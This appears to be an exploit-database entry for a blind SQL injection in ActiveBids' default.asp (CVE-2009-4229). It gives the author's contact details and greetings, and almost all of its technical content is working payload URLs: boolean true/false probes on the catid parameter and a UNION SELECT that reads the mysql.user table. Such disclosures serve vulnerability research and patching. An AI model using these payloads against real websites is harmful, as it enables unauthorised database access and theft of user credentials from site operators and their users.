ActiveBids - 'default.asp' Blind SQL Injection

Author: Hussin X
type: webapps
platform: asp
port: 
date_added: 2009-11-16 
date_updated:  
verified: 1 
codes: CVE-2009-4229;OSVDB-60872 
tags: 
aliases:  
screenshot_url:  
application_url: 

ActiveBids (default.asp) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : hussin.x@gmail.com
____________________________________

Vendor : http://www.activewebsoftwares.com
Demo :
_______

http://server/default.asp?catid=39+and+1=1 ( true )

http://server/default.asp?catid=39+and+1=0 ( false )

:: test ::

http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+mysql.user

Greetz :
WwW.IQ-ty.CoM

| CraCkEr | Cyber-Zone | str0ke | jiko